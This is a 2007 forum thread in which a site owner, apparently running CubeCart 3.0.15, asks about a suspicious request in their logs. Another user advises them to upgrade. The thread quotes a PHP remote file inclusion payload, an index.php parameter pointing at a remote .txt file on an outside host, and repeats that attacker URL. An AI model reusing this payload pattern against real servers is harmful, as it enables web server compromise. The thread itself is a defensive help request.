bathroomboy Posted November 25, 2007 Share Posted November 25, 2007 Dear all, I was browsing my online guests and noticed the following /index.php?act=http://amymusicgirl.h17.ru/mysong.txt? on checking I found this info: PHP File Inclusion Attacks This list is a real-time, ordered list of sites hosting files used to attack and compromise web servers via php file inclusion and/or XSS vulnerabilities. The intent is to allow server administrators to take some form of action to protect their systems from compromise such as: Firewalling off the offeding IPs Blackholing the DNS records for these sites (i.e. setting them to 127.0.0.1) Can someone fill me in on this attack? If you follow this link http://amymusicgirl.h17.ru/mysong.txt? you see the code. Thanks Quote Link to comment Share on other sites More sharing options...
Guest EverythingWeb Posted November 26, 2007 Share Posted November 26, 2007 What version of CC are you running? Later versions of the 3.X branch will not be vulnerable to these attacks :( Quote Link to comment Share on other sites More sharing options...
bathroomboy Posted November 27, 2007 Author Share Posted November 27, 2007 What version of CC are you running? Later versions of the 3.X branch will not be vulnerable to these attacks Sorry for the late reply. I am using version 3.0.15. Quote Link to comment Share on other sites More sharing options...
Guest EverythingWeb Posted November 27, 2007 Share Posted November 27, 2007 Upgrade to be safe. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.